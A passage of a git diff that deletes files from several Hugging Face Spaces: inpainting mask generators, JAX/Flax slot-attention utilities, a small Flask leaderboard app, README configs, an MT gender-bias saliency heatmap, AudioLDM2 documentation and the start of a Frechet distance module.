boarderGap=20, - maxInitSpeed=10 -): - ''' - Implementation the free-form training masks generating algorithm - proposed by JIAHUI YU et al. 
in "Free-Form Image Inpainting with Gated Convolution" - ''' - startX = np.random.randint(imageWidth) - startY = np.random.randint(imageHeight) - Xs = [startX] - Ys = [startY] - - numVertex = np.random.randint(nVertexBound[0], nVertexBound[1]) - - angle = np.random.uniform(0, 2 * np.pi) - speed = np.random.uniform(0, maxHeadSpeed) - - for i in range(numVertex): - speed, angle = random_accelerate((speed, angle), maxHeadAcceleration) - speed = np.clip(speed, 0, maxHeadSpeed) - - nextX = startX + speed * np.sin(angle) - nextY = startY + speed * np.cos(angle) - - if boarderGap is not None: - nextX = np.clip(nextX, boarderGap, imageWidth - boarderGap) - nextY = np.clip(nextY, boarderGap, imageHeight - boarderGap) - - startX, startY = nextX, nextY - Xs.append(nextX) - Ys.append(nextY) - - velocity = get_random_velocity(maxInitSpeed, dist='guassian') - - return np.array(Xs), np.array(Ys), velocity - - -def get_random_velocity(max_speed, dist='uniform'): - if dist == 'uniform': - speed = np.random.uniform(max_speed) - elif dist == 'guassian': - speed = np.abs(np.random.normal(0, max_speed / 2)) - else: - raise NotImplementedError(f'Distribution type {dist} is not supported.') - - angle = np.random.uniform(0, 2 * np.pi) - return (speed, angle) - - -def draw_mask_by_control_points(mask, Xs, Ys, brushWidth, fill=255): - radius = brushWidth // 2 - 1 - for i in range(1, len(Xs)): - draw = ImageDraw.Draw(mask) - startX, startY = Xs[i - 1], Ys[i - 1] - nextX, nextY = Xs[i], Ys[i] - draw.line((startX, startY) + (nextX, nextY), fill=fill, width=brushWidth) - for x, y in zip(Xs, Ys): - draw.ellipse((x - radius, y - radius, x + radius, y + radius), fill=fill) - return mask - - -# modified from https://github.com/naoto0804/pytorch-inpainting-with-partial-conv/blob/master/generate_data.py -def get_random_walk_mask(imageWidth=320, imageHeight=180, length=None): - action_list = [[0, 1], [0, -1], [1, 0], [-1, 0]] - canvas = np.zeros((imageHeight, imageWidth)).astype("i") - if length is None: - length = imageWidth * imageHeight - x = random.randint(0, imageHeight - 1) - y = random.randint(0, imageWidth - 1) - x_list = [] - y_list = [] - for i in range(length): - r = random.randint(0, len(action_list) - 1) - x = np.clip(x + action_list[r][0], a_min=0, a_max=imageHeight - 1) - y = np.clip(y + action_list[r][1], a_min=0, a_max=imageWidth - 1) - x_list.append(x) - y_list.append(y) - canvas[np.array(x_list), np.array(y_list)] = 1 - return Image.fromarray(canvas * 255).convert('1') - - -def get_masked_ratio(mask): - """ - Calculate the masked ratio. - mask: Expected a binary PIL image, where 0 and 1 represent - masked(invalid) and valid pixel values. - """ - hist = mask.histogram() - return hist[0] / np.prod(mask.size) diff --git a/spaces/ondrejbiza/isa/invariant_slot_attention/lib/utils.py b/spaces/ondrejbiza/isa/invariant_slot_attention/lib/utils.py deleted file mode 100644 index 29797f86146e2c997047ea9d324c34e02b895d30..0000000000000000000000000000000000000000 --- a/spaces/ondrejbiza/isa/invariant_slot_attention/lib/utils.py +++ /dev/null @@ -1,625 +0,0 @@ -# coding=utf-8 -# Copyright 2023 The Google Research Authors. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. 
-# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -"""Common utils.""" - -import functools -import importlib -from typing import Any, Callable, Dict, Iterable, Mapping, Optional, Sequence, Type, Union - -from absl import logging -from clu import metrics as base_metrics - -import flax -from flax import linen as nn -from flax import traverse_util - -import jax -import jax.numpy as jnp -import jax.ops - -import matplotlib -import matplotlib.pyplot as plt -import ml_collections -import numpy as np -import optax - -import skimage.transform -import tensorflow as tf - -from invariant_slot_attention.lib import metrics - - -Array = Any # Union[np.ndarray, jnp.ndarray] -ArrayTree = Union[Array, Iterable["ArrayTree"], Mapping[str, "ArrayTree"]] # pytype: disable=not-supported-yet -DictTree = Dict[str, Union[Array, "DictTree"]] # pytype: disable=not-supported-yet -PRNGKey = Array -ConfigAttr = Any -MetricSpec = Dict[str, str] - - -@flax.struct.dataclass -class TrainState: - """Data structure for checkpointing the model.""" - step: int - opt_state: optax.OptState - params: ArrayTree - variables: flax.core.FrozenDict - rng: PRNGKey - - -METRIC_TYPE_TO_CLS = { - "loss": base_metrics.Average.from_output(name="loss"), - "ari": metrics.Ari, - "ari_nobg": metrics.AriNoBg, -} - - -def make_metrics_collection( - class_name, - metrics_spec): - """Create class inhering from metrics.Collection based on spec.""" - metrics_dict = {} - if metrics_spec: - for m_name, m_type in metrics_spec.items(): - metrics_dict[m_name] = METRIC_TYPE_TO_CLS[m_type] - - return flax.struct.dataclass( - type(class_name, - (base_metrics.Collection,), - {"__annotations__": metrics_dict})) - - -def flatten_named_dicttree(metrics_res, sep = "/"): - """Flatten dictionary.""" - metrics_res_flat = {} - for k, v in traverse_util.flatten_dict(metrics_res).items(): - metrics_res_flat[(sep.join(k)).strip(sep)] = v - return metrics_res_flat - - -def spatial_broadcast(x, resolution): - """Broadcast flat inputs to a 2D grid of a given resolution.""" - # x.shape = (batch_size, features). - x = x[:, jnp.newaxis, jnp.newaxis, :] - return jnp.tile(x, [1, resolution[0], resolution[1], 1]) - - -def time_distributed(cls, in_axes=1, axis=1): - """Wrapper for time-distributed (vmapped) application of a module.""" - return nn.vmap( - cls, in_axes=in_axes, out_axes=axis, axis_name="time", - # Stack debug vars along sequence dim and broadcast params. - variable_axes={ - "params": None, "intermediates": axis, "batch_stats": None}, - split_rngs={"params": False, "dropout": True, "state_init": True}) - - -def broadcast_across_batch(inputs, batch_size): - """Broadcasts inputs across a batch of examples (creates new axis).""" - return jnp.broadcast_to( - array=jnp.expand_dims(inputs, axis=0), - shape=(batch_size,) + inputs.shape) - - -def create_gradient_grid( - samples_per_dim, value_range = (-1.0, 1.0) - ): - """Creates a tensor with equidistant entries from -1 to +1 in each dim. - - Args: - samples_per_dim: Number of points to have along each dimension. - value_range: In each dimension, points will go from range[0] to range[1] - - Returns: - A tensor of shape [samples_per_dim] + [len(samples_per_dim)]. 
- """ - s = [jnp.linspace(value_range[0], value_range[1], n) for n in samples_per_dim] - pe = jnp.stack(jnp.meshgrid(*s, sparse=False, indexing="ij"), axis=-1) - return jnp.array(pe) - - -def convert_to_fourier_features(inputs, basis_degree): - """Convert inputs to Fourier features, e.g. for positional encoding.""" - - # inputs.shape = (..., n_dims). - # inputs should be in range [-pi, pi] or [0, 2pi]. - n_dims = inputs.shape[-1] - - # Generate frequency basis. - freq_basis = jnp.concatenate( # shape = (n_dims, n_dims * basis_degree) - [2**i * jnp.eye(n_dims) for i in range(basis_degree)], 1) - - # x.shape = (..., n_dims * basis_degree) - x = inputs @ freq_basis # Project inputs onto frequency basis. - - # Obtain Fourier features as [sin(x), cos(x)] = [sin(x), sin(x + 0.5 * pi)]. - return jnp.sin(jnp.concatenate([x, x + 0.5 * jnp.pi], axis=-1)) - - -def prepare_images_for_logging( - config, - batch = None, - preds = None, - n_samples = 5, - n_frames = 5, - min_n_colors = 1, - epsilon = 1e-6, - first_replica_only = False): - """Prepare images from batch and/or model predictions for logging.""" - - images = dict() - # Converts all tensors to numpy arrays to run everything on CPU as JAX - # eager mode is inefficient and because memory usage from these ops may - # lead to OOM errors. - batch = jax.tree_map(np.array, batch) - preds = jax.tree_map(np.array, preds) - - if n_samples <= 0: - return images - - if not first_replica_only: - # Move the two leading batch dimensions into a single dimension. We do this - # to plot the same number of examples regardless of the data parallelism. - batch = jax.tree_map(lambda x: np.reshape(x, (-1,) + x.shape[2:]), batch) - preds = jax.tree_map(lambda x: np.reshape(x, (-1,) + x.shape[2:]), preds) - else: - batch = jax.tree_map(lambda x: x[0], batch) - preds = jax.tree_map(lambda x: x[0], preds) - - # Limit the tensors to n_samples and n_frames. - batch = jax.tree_map( - lambda x: x[:n_samples, :n_frames] if x.ndim > 2 else x[:n_samples], - batch) - preds = jax.tree_map( - lambda x: x[:n_samples, :n_frames] if x.ndim > 2 else x[:n_samples], - preds) - - # Log input data. - if batch is not None: - images["video"] = video_to_image_grid(batch["video"]) - if "segmentations" in batch: - images["mask"] = video_to_image_grid(convert_categories_to_color( - batch["segmentations"], min_n_colors=min_n_colors)) - if "flow" in batch: - images["flow"] = video_to_image_grid(batch["flow"]) - if "boxes" in batch: - images["boxes"] = draw_bounding_boxes( - batch["video"], - batch["boxes"], - min_n_colors=min_n_colors) - - # Log model predictions. - if preds is not None and preds.get("outputs") is not None: - if "segmentations" in preds["outputs"]: # pytype: disable=attribute-error - images["segmentations"] = video_to_image_grid( - convert_categories_to_color( - preds["outputs"]["segmentations"], min_n_colors=min_n_colors)) - - def shape_fn(x): - if isinstance(x, (np.ndarray, jnp.ndarray)): - return x.shape - - # Log intermediate variables. - if preds is not None and "intermediates" in preds: - - logging.info("intermediates: %s", - jax.tree_map(shape_fn, preds["intermediates"])) - - for key, path in config.debug_var_video_paths.items(): - log_vars = retrieve_from_collection(preds["intermediates"], path) - if log_vars is not None: - if not isinstance(log_vars, Sequence): - log_vars = [log_vars] - for i, log_var in enumerate(log_vars): - log_var = np.array(log_var) # Moves log_var to CPU. 
- images[key + "_" + str(i)] = video_to_image_grid(log_var) - else: - logging.warning("%s not found in intermediates", path) - - # Log attention weights. - for key, path in config.debug_var_attn_paths.items(): - log_vars = retrieve_from_collection(preds["intermediates"], path) - if log_vars is not None: - if not isinstance(log_vars, Sequence): - log_vars = [log_vars] - for i, log_var in enumerate(log_vars): - log_var = np.array(log_var) # Moves log_var to CPU. - images.update( - prepare_attention_maps_for_logging( - attn_maps=log_var, - key=key + "_" + str(i), - map_width=config.debug_var_attn_widths.get(key), - video=batch["video"], - epsilon=epsilon, - n_samples=n_samples, - n_frames=n_frames)) - else: - logging.warning("%s not found in intermediates", path) - - # Crop each image to a maximum of 3 channels for RGB visualization. - for key, image in images.items(): - if image.shape[-1] > 3: - logging.warning("Truncating channels of %s for visualization.", key) - images[key] = image[Ellipsis, :3] - - return images - - -def prepare_attention_maps_for_logging(attn_maps, key, - map_width, epsilon, - n_samples, n_frames, - video): - """Visualize (overlayed) attention maps as an image grid.""" - images = {} # Results dictionary. - attn_maps = unflatten_image(attn_maps[Ellipsis, None], width=map_width) - - num_heads = attn_maps.shape[2] - for head_idx in range(num_heads): - attn = attn_maps[:n_samples, :n_frames, head_idx] - attn /= attn.max() + epsilon # Standardizes scale for visualization. - # attn.shape: [bs, seq_len, 11, h', w', 1] - - bs, seq_len, _, h_attn, w_attn, _ = attn.shape - images[f"{key}_head_{head_idx}"] = video_to_image_grid(attn) - - # Attention maps are interpretable when they align with object boundaries. - # However, if they are overly smooth then the following visualization which - # overlays attention maps on video is helpful. - video = video[:n_samples, :n_frames] - # video.shape: [bs, seq_len, h, w, 3] - video_resized = [] - for i in range(n_samples): - for j in range(n_frames): - video_resized.append( - skimage.transform.resize(video[i, j], (h_attn, w_attn), order=1)) - video_resized = np.array(video_resized).reshape( - (bs, seq_len, h_attn, w_attn, 3)) - attn_overlayed = attn * np.expand_dims(video_resized, 2) - images[f"{key}_head_{head_idx}_overlayed"] = video_to_image_grid( - attn_overlayed) - - return images - - -def convert_categories_to_color( - inputs, min_n_colors = 1, include_black = True): - """Converts int-valued categories to color in last axis of input tensor. - - Args: - inputs: `np.ndarray` of arbitrary shape with integer entries, encoding the - categories. - min_n_colors: Minimum number of colors (excl. black) to encode categories. - include_black: Include black as 0-th entry in the color palette. Increases - `min_n_colors` by 1 if True. - - Returns: - `np.ndarray` with RGB colors in last axis. - """ - if inputs.shape[-1] == 1: # Strip category axis. - inputs = np.squeeze(inputs, axis=-1) - inputs = np.array(inputs, dtype=np.int32) # Convert to int. - - # Infer number of colors from inputs. - n_colors = int(inputs.max()) + 1 # One color per category incl. 0. - if include_black: - n_colors -= 1 # If we include black, we need one color less. - - if min_n_colors > n_colors: # Use more colors in color palette if requested. - n_colors = min_n_colors - - rgb_colors = get_uniform_colors(n_colors) - - if include_black: # Add black as color for zero-th index. 
- rgb_colors = np.concatenate((np.zeros((1, 3)), rgb_colors), axis=0) - return rgb_colors[inputs] - - -def get_uniform_colors(n_colors): - """Get n_colors with uniformly spaced hues.""" - hues = np.linspace(0, 1, n_colors, endpoint=False) - hsv_colors = np.concatenate( - (np.expand_dims(hues, axis=1), np.ones((n_colors, 2))), axis=1) - rgb_colors = matplotlib.colors.hsv_to_rgb(hsv_colors) - return rgb_colors # rgb_colors.shape = (n_colors, 3) - - -def unflatten_image(image, width = None): - """Unflatten image array of shape [batch_dims..., height*width, channels].""" - n_channels = image.shape[-1] - # If width is not provided, we assume that the image is square. - if width is None: - width = int(np.floor(np.sqrt(image.shape[-2]))) - height = width - assert width * height == image.shape[-2], "Image is not square." - else: - height = image.shape[-2] // width - return image.reshape(image.shape[:-2] + (height, width, n_channels)) - - -def video_to_image_grid(video): - """Transform video to image grid by folding sequence dim along width.""" - if len(video.shape) == 5: - n_samples, n_frames, height, width, n_channels = video.shape - video = np.transpose(video, (0, 2, 1, 3, 4)) # Swap n_frames and height. - image_grid = np.reshape( - video, (n_samples, height, n_frames * width, n_channels)) - elif len(video.shape) == 6: - n_samples, n_frames, n_slots, height, width, n_channels = video.shape - # Put n_frames next to width. - video = np.transpose(video, (0, 2, 3, 1, 4, 5)) - image_grid = np.reshape( - video, (n_samples, n_slots * height, n_frames * width, n_channels)) - else: - raise ValueError("Unsupported video shape for visualization.") - return image_grid - - -def draw_bounding_boxes(video, - boxes, - min_n_colors = 1, - include_black = True): - """Draw bounding boxes in videos.""" - colors = get_uniform_colors(min_n_colors - include_black) - - b, t, h, w, c = video.shape - n = boxes.shape[2] - image_grid = tf.image.draw_bounding_boxes( - np.reshape(video, (b * t, h, w, c)), - np.reshape(boxes, (b * t, n, 4)), - colors).numpy() - image_grid = np.reshape( - np.transpose(np.reshape(image_grid, (b, t, h, w, c)), - (0, 2, 1, 3, 4)), - (b, h, t * w, c)) - return image_grid - - -def plot_image(ax, image): - """Add an image visualization to a provided `plt.Axes` instance.""" - num_channels = image.shape[-1] - if num_channels == 1: - image = image.reshape(image.shape[:2]) - ax.imshow(image, cmap="viridis") - ax.grid(False) - plt.axis("off") - - -def visualize_image_dict(images, plot_scale = 10): - """Visualize a dictionary of images in colab using maptlotlib.""" - - for key in images.keys(): - logging.info("Visualizing key: %s", key) - n_images = len(images[key]) - fig = plt.figure(figsize=(n_images * plot_scale, plot_scale)) - for idx, image in enumerate(images[key]): - ax = fig.add_subplot(1, n_images, idx+1) - plot_image(ax, image) - plt.show() - - -def filter_key_from_frozen_dict( - frozen_dict, key): - """Filters (removes) an item by key from a flax.core.FrozenDict.""" - if key in frozen_dict: - frozen_dict, _ = frozen_dict.pop(key) - return frozen_dict - - -def prepare_dict_for_logging(nested_dict, parent_key = "", - sep = "_"): - """Prepare a nested dictionary for logging with `clu.metric_writers`. - - Args: - nested_dict: A nested dictionary, e.g. obtained from a - `ml_collections.ConfigDict` via `.to_dict()`. - parent_key: String used in recursion. - sep: String used to separate parent and child keys. - - Returns: - Flattened dict. 
- """ - items = [] - for k, v in nested_dict.items(): - # Flatten keys of nested elements. - new_key = parent_key + sep + k if parent_key else k - - # Convert None values, lists and tuples to strings. - if v is None: - v = "None" - if isinstance(v, list) or isinstance(v, tuple): - v = str(v) - - # Recursively flatten the dict. - if isinstance(v, dict): - items.extend(prepare_dict_for_logging(v, new_key, sep=sep).items()) - else: - items.append((new_key, v)) - return dict(items) - - -def retrieve_from_collection( - variable_collection, path): - """Finds variables by their path by recursively searching the collection. - - Args: - variable_collection: Nested dict containing the variables (or tuples/lists - of variables). - path: Path to variable in module tree, similar to Unix file names (e.g. - '/module/dense/0/bias'). - - Returns: - The requested variable, variable collection or None (in case the variable - could not be found). - """ - key, _, rpath = path.strip("/").partition("/") - - # In case the variable is not found, we return None. - if (key.isdigit() and not isinstance(variable_collection, Sequence)) or ( - key.isdigit() and int(key) >= len(variable_collection)) or ( - not key.isdigit() and key not in variable_collection): - return None - - if key.isdigit(): - key = int(key) - - if not rpath: - return variable_collection[key] - else: - return retrieve_from_collection(variable_collection[key], rpath) - - -def build_model_from_config(config): - """Build a Flax model from a (nested) ConfigDict.""" - model_constructor = _parse_config(config) - if callable(model_constructor): - return model_constructor() - else: - raise ValueError("Provided config does not contain module constructors.") - - -def _parse_config(config - ): - """Recursively parses a nested ConfigDict and resolves module constructors.""" - - if isinstance(config, list): - return [_parse_config(c) for c in config] - elif isinstance(config, tuple): - return tuple([_parse_config(c) for c in config]) - elif not isinstance(config, ml_collections.ConfigDict): - return config - elif "module" in config: - module_constructor = _resolve_module_constructor(config.module) - kwargs = {k: _parse_config(v) for k, v in config.items() if k != "module"} - return functools.partial(module_constructor, **kwargs) - else: - return {k: _parse_config(v) for k, v in config.items()} - - -def _resolve_module_constructor( - constructor_str): - import_str, _, module_name = constructor_str.rpartition(".") - py_module = importlib.import_module(import_str) - return getattr(py_module, module_name) - - -def get_slices_along_axis( - inputs, - slice_keys, - start_idx = 0, - end_idx = -1, - axis = 2, - pad_value = 0): - """Extracts slices from a dictionary of tensors along the specified axis. - - The slice operation is only applied to `slice_keys` dictionary keys. If - `end_idx` is larger than the actual size of the specified axis, padding is - added (with values provided in `pad_value`). - - Args: - inputs: Dictionary of tensors. - slice_keys: Iterable of strings, the keys for the inputs dictionary for - which to apply the slice operation. - start_idx: Integer, defining the first index to be part of the slice. - end_idx: Integer, defining the end of the slice interval (exclusive). If set - to `-1`, the end index is set to the size of the axis. If a value is - provided that is larger than the size of the axis, zero-padding is added - for the remaining elements. - axis: Integer, the axis along which to slice. - pad_value: Integer, value to be used in padding. 
- - Returns: - Dictionary of tensors where elements described in `slice_keys` are sliced, - and all other elements are returned as original. - """ - - max_size = None - pad_size = 0 - - # Check shapes and get maximum size of requested axis. - for key in slice_keys: - curr_size = inputs[key].shape[axis] - if max_size is None: - max_size = curr_size - elif max_size != curr_size: - raise ValueError( - "For specified tensors the requested axis needs to be of equal size.") - - # Infer end index if not provided. - if end_idx == -1: - end_idx = max_size - - # Set padding size if end index is larger than maximum size of requested axis. - elif end_idx > max_size: - pad_size = end_idx - max_size - end_idx = max_size - - outputs = {} - for key in slice_keys: - outputs[key] = np.take( - inputs[key], indices=np.arange(start_idx, end_idx), axis=axis) - - # Add padding if necessary. - if pad_size > 0: - pad_shape = np.array(outputs[key].shape) - np.put(pad_shape, axis, pad_size) # In-place op. - padding = pad_value * np.ones(pad_shape, dtype=outputs[key].dtype) - outputs[key] = np.concatenate((outputs[key], padding), axis=axis) - - return outputs - - -def get_element_by_str( - dictionary, multilevel_key, separator = "/" - ): - """Gets element in a dictionary with multilevel key (e.g., "key1/key2").""" - keys = multilevel_key.split(separator) - if len(keys) == 1: - return dictionary[keys[0]] - return get_element_by_str( - dictionary[keys[0]], separator.join(keys[1:]), separator=separator) - - -def set_element_by_str( - dictionary, multilevel_key, new_value, - separator = "/"): - """Sets element in a dictionary with multilevel key (e.g., "key1/key2").""" - keys = multilevel_key.split(separator) - if len(keys) == 1: - if keys[0] not in dictionary: - key_error = ( - "Pretrained {key} was not found in trained model. " - "Make sure you are loading the correct pretrained model " - "or consider adding {key} to exceptions.") - raise KeyError(key_error.format(type="parameter", key=keys[0])) - dictionary[keys[0]] = new_value - else: - set_element_by_str( - dictionary[keys[0]], - separator.join(keys[1:]), - new_value, - separator=separator) - - -def remove_singleton_dim(inputs): - """Removes the final dimension if it is singleton (i.e. 
of size 1).""" - if inputs is None: - return None - if inputs.shape[-1] != 1: - logging.warning("Expected final dimension of inputs to be 1, " - "received inputs of shape %s: ", str(inputs.shape)) - return inputs - return inputs[Ellipsis, 0] - diff --git a/spaces/opencompass/opencompass-llm-leaderboard/app.py b/spaces/opencompass/opencompass-llm-leaderboard/app.py deleted file mode 100644 index 6d123b2485c4662a4166d80aafef180cbcf2752e..0000000000000000000000000000000000000000 --- a/spaces/opencompass/opencompass-llm-leaderboard/app.py +++ /dev/null @@ -1,12 +0,0 @@ -from flask import Flask, render_template - -app = Flask(__name__) - - -@app.route("/") -def index(): - return render_template("index.html") - - -if __name__ == "__main__": - app.run(debug=False, port=7860, host="0.0.0.0") diff --git a/spaces/optimum/llm-perf-leaderboard/README.md b/spaces/optimum/llm-perf-leaderboard/README.md deleted file mode 100644 index f1fd576468b4f832ee844507a61bc57ff0fda33b..0000000000000000000000000000000000000000 --- a/spaces/optimum/llm-perf-leaderboard/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: LLM-Perf Leaderboard -emoji: 🏆🏋️ -colorFrom: green -colorTo: indigo -sdk: gradio -sdk_version: 3.42.0 -app_file: app.py -pinned: true -license: apache-2.0 -tags: [llm performance leaderboard, llm perf leaderboard, llm, performance, leaderboard] ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git "a/spaces/oskarvanderwal/MT-bias-demo/results/counterfactual_m\303\251rn\303\266k.html" "b/spaces/oskarvanderwal/MT-bias-demo/results/counterfactual_m\303\251rn\303\266k.html" deleted file mode 100644 index 9819c57bd1a7475934e66c8ddb536261b59417e7..0000000000000000000000000000000000000000 --- "a/spaces/oskarvanderwal/MT-bias-demo/results/counterfactual_m\303\251rn\303\266k.html" +++ /dev/null @@ -1,23 +0,0 @@ -
-0th instance:
-Source Saliency Heatmap
-x: Generated tokens, y: Attributed tokens
-Generated tokens:   ▁He's → ▁She's    ▁an       ▁engineer.    </s>
-▁Ő                  -0.015             0.008    -0.01          0.808
-▁mérnök.             0.005            -0.004    -0.0          -1.699
-</s>                 0.0               0.0       0.0           0.0
-probability         -0.356             0.0      -0.001         0.001
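For reference, a source saliency table like the one above can be produced with a feature-attribution library. The sketch below is illustrative only: it assumes the inseq library and the Helsinki-NLP/opus-mt-hu-en translation model as stand-ins, since the demo's actual attribution pipeline is not part of this diff.

```python
# Hedged sketch: reproduce a source saliency heatmap for the gender-neutral
# Hungarian sentence "Ő mérnök." under two forced English targets.
# Assumptions: the `inseq` library and the Helsinki-NLP/opus-mt-hu-en model are
# illustrative choices, not confirmed by this diff.
import inseq

# Load a Hungarian -> English translation model together with an attribution method.
model = inseq.load_model("Helsinki-NLP/opus-mt-hu-en", "integrated_gradients")

# Attribute the same source against the original and counterfactual targets
# ("He's ..." vs. "She's ...") to compare token-level saliency.
for target in ["He's an engineer.", "She's an engineer."]:
    out = model.attribute(input_texts="Ő mérnök.", generated_texts=target)
    out.show()  # renders a "Source Saliency Heatmap" table like the one above
```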
      - - - - - diff --git a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/docs/source/en/api/pipelines/audioldm2.md b/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/docs/source/en/api/pipelines/audioldm2.md deleted file mode 100644 index e4b2221b2eb5b25aa14fe59bfe34266410de7fec..0000000000000000000000000000000000000000 --- a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/docs/source/en/api/pipelines/audioldm2.md +++ /dev/null @@ -1,93 +0,0 @@ - - -# AudioLDM 2 - -AudioLDM 2 was proposed in [AudioLDM 2: Learning Holistic Audio Generation with Self-supervised Pretraining](https://arxiv.org/abs/2308.05734) -by Haohe Liu et al. AudioLDM 2 takes a text prompt as input and predicts the corresponding audio. It can generate -text-conditional sound effects, human speech and music. - -Inspired by [Stable Diffusion](https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion/overview), AudioLDM 2 -is a text-to-audio _latent diffusion model (LDM)_ that learns continuous audio representations from text embeddings. Two -text encoder models are used to compute the text embeddings from a prompt input: the text-branch of [CLAP](https://huggingface.co/docs/transformers/main/en/model_doc/clap) -and the encoder of [Flan-T5](https://huggingface.co/docs/transformers/main/en/model_doc/flan-t5). These text embeddings -are then projected to a shared embedding space by an [AudioLDM2ProjectionModel](https://huggingface.co/docs/diffusers/main/api/pipelines/audioldm2#diffusers.AudioLDM2ProjectionModel). -A [GPT2](https://huggingface.co/docs/transformers/main/en/model_doc/gpt2) _language model (LM)_ is used to auto-regressively -predict eight new embedding vectors, conditional on the projected CLAP and Flan-T5 embeddings. The generated embedding -vectors and Flan-T5 text embeddings are used as cross-attention conditioning in the LDM. The [UNet](https://huggingface.co/docs/diffusers/main/en/api/pipelines/audioldm2#diffusers.AudioLDM2UNet2DConditionModel) -of AudioLDM 2 is unique in the sense that it takes **two** cross-attention embeddings, as opposed to one cross-attention -conditioning, as in most other LDMs. - -The abstract of the paper is the following: - -*Although audio generation shares commonalities across different types of audio, such as speech, music, and sound effects, designing models for each type requires careful consideration of specific objectives and biases that can significantly differ from those of other types. To bring us closer to a unified perspective of audio generation, this paper proposes a framework that utilizes the same learning method for speech, music, and sound effect generation. Our framework introduces a general representation of audio, called language of audio (LOA). Any audio can be translated into LOA based on AudioMAE, a self-supervised pre-trained representation learning model. In the generation process, we translate any modalities into LOA by using a GPT-2 model, and we perform self-supervised audio generation learning with a latent diffusion model conditioned on LOA. The proposed framework naturally brings advantages such as in-context learning abilities and reusable self-supervised pretrained AudioMAE and latent diffusion models. Experiments on the major benchmarks of text-to-audio, text-to-music, and text-to-speech demonstrate new state-of-the-art or competitive performance to previous approaches.* - -This pipeline was contributed by [sanchit-gandhi](https://huggingface.co/sanchit-gandhi). 
The original codebase can be -found at [haoheliu/audioldm2](https://github.com/haoheliu/audioldm2). - -## Tips - -### Choosing a checkpoint - -AudioLDM2 comes in three variants. Two of these checkpoints are applicable to the general task of text-to-audio -generation. The third checkpoint is trained exclusively on text-to-music generation. - -All checkpoints share the same model size for the text encoders and VAE. They differ in the size and depth of the UNet. -See table below for details on the three checkpoints: - -| Checkpoint | Task | UNet Model Size | Total Model Size | Training Data / h | -|-----------------------------------------------------------------|---------------|-----------------|------------------|-------------------| -| [audioldm2](https://huggingface.co/cvssp/audioldm2) | Text-to-audio | 350M | 1.1B | 1150k | -| [audioldm2-large](https://huggingface.co/cvssp/audioldm2-large) | Text-to-audio | 750M | 1.5B | 1150k | -| [audioldm2-music](https://huggingface.co/cvssp/audioldm2-music) | Text-to-music | 350M | 1.1B | 665k | - -### Constructing a prompt - -* Descriptive prompt inputs work best: use adjectives to describe the sound (e.g. "high quality" or "clear") and make the prompt context specific (e.g. "water stream in a forest" instead of "stream"). -* It's best to use general terms like "cat" or "dog" instead of specific names or abstract objects the model may not be familiar with. -* Using a **negative prompt** can significantly improve the quality of the generated waveform, by guiding the generation away from terms that correspond to poor quality audio. Try using a negative prompt of "Low quality." - -### Controlling inference - -* The _quality_ of the predicted audio sample can be controlled by the `num_inference_steps` argument; higher steps give higher quality audio at the expense of slower inference. -* The _length_ of the predicted audio sample can be controlled by varying the `audio_length_in_s` argument. - -### Evaluating generated waveforms: - -* The quality of the generated waveforms can vary significantly based on the seed. Try generating with different seeds until you find a satisfactory generation -* Multiple waveforms can be generated in one go: set `num_waveforms_per_prompt` to a value greater than 1. Automatic scoring will be performed between the generated waveforms and prompt text, and the audios ranked from best to worst accordingly. - -The following example demonstrates how to construct good music generation using the aforementioned tips: [example](https://huggingface.co/docs/diffusers/main/en/api/pipelines/audioldm2#diffusers.AudioLDM2Pipeline.__call__.example). - - - -Make sure to check out the Schedulers [guide](/using-diffusers/schedulers) to learn how to explore the tradeoff between -scheduler speed and quality, and see the [reuse components across pipelines](/using-diffusers/loading#reuse-components-across-pipelines) -section to learn how to efficiently load the same components into multiple pipelines. 
- - - -## AudioLDM2Pipeline -[[autodoc]] AudioLDM2Pipeline - - all - - __call__ - -## AudioLDM2ProjectionModel -[[autodoc]] AudioLDM2ProjectionModel - - forward - -## AudioLDM2UNet2DConditionModel -[[autodoc]] AudioLDM2UNet2DConditionModel - - forward - -## AudioPipelineOutput -[[autodoc]] pipelines.AudioPipelineOutput \ No newline at end of file diff --git a/spaces/paragon-analytics/ResText/README.md b/spaces/paragon-analytics/ResText/README.md deleted file mode 100644 index 10a9b4b1162972cd51d2b721d4e7d3fd191aa8e9..0000000000000000000000000000000000000000 --- a/spaces/paragon-analytics/ResText/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: ResText -emoji: 🚀 -colorFrom: purple -colorTo: green -sdk: gradio -sdk_version: 3.41.2 -app_file: app.py -pinned: false -license: mit -python_version: 3.9.13 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/paulengstler/interpretable-vertebral-fracture-diagnosis/netdissect/frechet_distance.py b/spaces/paulengstler/interpretable-vertebral-fracture-diagnosis/netdissect/frechet_distance.py deleted file mode 100644 index 8ce1435aa7eff4d18489193acdba13df391f8a9b..0000000000000000000000000000000000000000 --- a/spaces/paulengstler/interpretable-vertebral-fracture-diagnosis/netdissect/frechet_distance.py +++ /dev/null @@ -1,118 +0,0 @@ -#!/usr/bin/env python3 -"""Calculates the Frechet Distance (FD) between two samples. - -Code apapted from https://github.com/bioinf-jku/TTUR to use PyTorch instead -of Tensorflow - -Copyright 2018 Institute of Bioinformatics, JKU Linz - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. -""" -import numpy as np -import torch -from scipy import linalg - -def sample_frechet_distance(sample1, sample2, eps=1e-6, - return_components=False): - ''' - Both samples should be numpy arrays. - Returns the Frechet distance. - ''' - (mu1, sigma1), (mu2, sigma2) = [calculate_activation_statistics(s) - for s in [sample1, sample2]] - return 